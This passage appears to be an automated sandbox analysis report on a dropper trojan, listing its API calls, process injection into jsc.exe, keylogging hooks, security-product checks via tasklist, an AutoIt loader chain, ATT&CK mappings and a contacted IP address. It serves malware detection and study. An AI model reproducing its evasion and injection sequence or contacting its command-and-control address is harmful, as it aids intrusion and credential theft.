          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009A88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_009A88CD
          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00414365 SetUnhandledExceptionFilter,0_2_00414365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_004145D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004145D4
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0097A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0097A385
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0097A354 SetUnhandledExceptionFilter,10_2_0097A354
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: BE0000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: BE0000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: DC7000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009A9369 LogonUserW,10_2_009A9369
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00965240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00965240
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B1AC6 SendInput,keybd_event,10_2_009B1AC6
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B51E2 mouse_event,10_2_009B51E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe" Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Bel.tmpJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq BullGuardCore.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "bullguardcore.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq PSUAService.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "psuaservice.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif Rarissima.exe.pif uJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\waitfor.exe waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADwJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009A88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_009A88CD
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_009B4F1C
          Source: Rarissima.exe.pif, 0000000A.00000000.1174665285.0000000000A06000.00000002.00000001.01000000.00000006.sdmp, Dici.tmp.0.dr, Rarissima.exe.pif.4.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: Rarissima.exe.pifBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_0040D280 cpuid 0_2_0040D280
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_0040275A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00404AEB ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetLocalTime,GetFileAttributesW,LoadLibraryW,GetComputerNameW,wcscmp,wcscmp,wcscmp,wcscmp,wcscmp,wcscmp,wcscmp,GetModuleHandleW,GetModuleHandleW,GetLastError,GetModuleHandleW,GetProcAddress,MessageBoxTimeoutW,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitializeEx,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00404AEB
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00990722 GetUserNameW,10_2_00990722
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_0098416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_0098416A
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00965D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00965D13
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Rarissima.exe.pif PID: 7608, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 7576, type: MEMORYSTR
          Source: Rarissima.exe.pifBinary or memory string: WIN_81
          Source: Rarissima.exe.pifBinary or memory string: WIN_XP
          Source: Rarissima.exe.pifBinary or memory string: WIN_XPe
          Source: Rarissima.exe.pifBinary or memory string: WIN_VISTA
          Source: Rarissima.exe.pifBinary or memory string: WIN_7
          Source: Rarissima.exe.pifBinary or memory string: WIN_8
          Source: Rarissima.exe.pif.4.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Rarissima.exe.pif PID: 7608, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 7576, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009C696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_009C696E
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009C6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_009C6E32
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          1
          Windows Management Instrumentation
          11
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          11
          Disable or Modify Tools
          121
          Input Capture
          12
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts3
          Native API
          2
          Valid Accounts
          11
          DLL Side-Loading
          11
          Deobfuscate/Decode Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol121
          Input Capture
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts12
          Command and Scripting Interpreter
          Logon Script (Windows)2
          Valid Accounts
          3
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares3
          Clipboard Data
          1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation
          1
          Software Packing
          NTDS37
          System Information Discovery
          Distributed Component Object ModelInput Capture1
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
          Process Injection
          11
          DLL Side-Loading
          LSA Secrets31
          Security Software Discovery
          SSHKeylogging11
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading
          Cached Domain Credentials2
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Valid Accounts
          DCSync4
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Virtualization/Sandbox Evasion
          Proc Filesystem1
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
          Access Token Manipulation
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
          Process Injection
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632796 Sample: SecuriteInfo.com.Trojan.Mul... Startdate: 09/03/2025 Architecture: WINDOWS Score: 100 44 xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcb 2->44 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for dropped file 2->52 54 5 other signatures 2->54 10 SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe 6 2->10         started        signatures3 process4 file5 42 C:\Users\user\AppData\Local\Temp\...\Dici.tmp, data 10->42 dropped 66 Contains functionality to register a low level keyboard hook 10->66 14 cmd.exe 1 10->14         started        17 svchost.exe 10->17         started        signatures6 process7 signatures8 68 Obfuscated command line found 14->68 70 Drops PE files with a suspicious file extension 14->70 19 cmd.exe 2 14->19         started        23 conhost.exe 14->23         started        process9 file10 38 C:\Users\user\AppData\...\Rarissima.exe.pif, PE32 19->38 dropped 56 Obfuscated command line found 19->56 25 Rarissima.exe.pif 1 19->25         started        29 tasklist.exe 1 19->29         started        31 tasklist.exe 1 19->31         started        33 4 other processes 19->33 signatures11 process12 file13 40 C:\Users\user\AppData\...\xBCzEiVyOcVH.dll, PE32 25->40 dropped 58 DLL reload attack detected 25->58 60 Writes to foreign memory regions 25->60 62 Renames NTDLL to bypass HIPS 25->62 64 Injects a PE file into a foreign processes 25->64 35 jsc.exe 2 25->35         started        signatures14 process15 dnsIp16 46 45.67.231.189, 49441, 49721, 49722 SERVERIUS-ASNL Moldova Republic of 35->46

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe71%VirustotalBrowse
          SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe58%ReversingLabsWin32.Trojan.Generic
          SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe100%AviraHEUR/AGEN.1307022
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dici.tmp100%AviraDR/FakePic.Gen
          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif3%ReversingLabs
          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dll0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          45.67.231.189:494410%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcb
          unknown
          unknowntrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            45.67.231.189:49441true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://tempuri.org/Entity/Id10Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://tempuri.org/Entity/Id24LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://tempuri.org/Entity/Id8Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyxjsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://tempuri.org/Entity/Id16(jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://tempuri.org/Entity/Id22LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://tempuri.org/Entity/Id20LRjsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://tempuri.org/Entity/Id12Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/soap/envelope/jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://tempuri.org/Entity/Id2Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/Entity/Id21Responsejsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.autoitscript.com/autoit3/Dici.tmp.0.dr, Rarissima.exe.pif.4.drfalse
                                    high
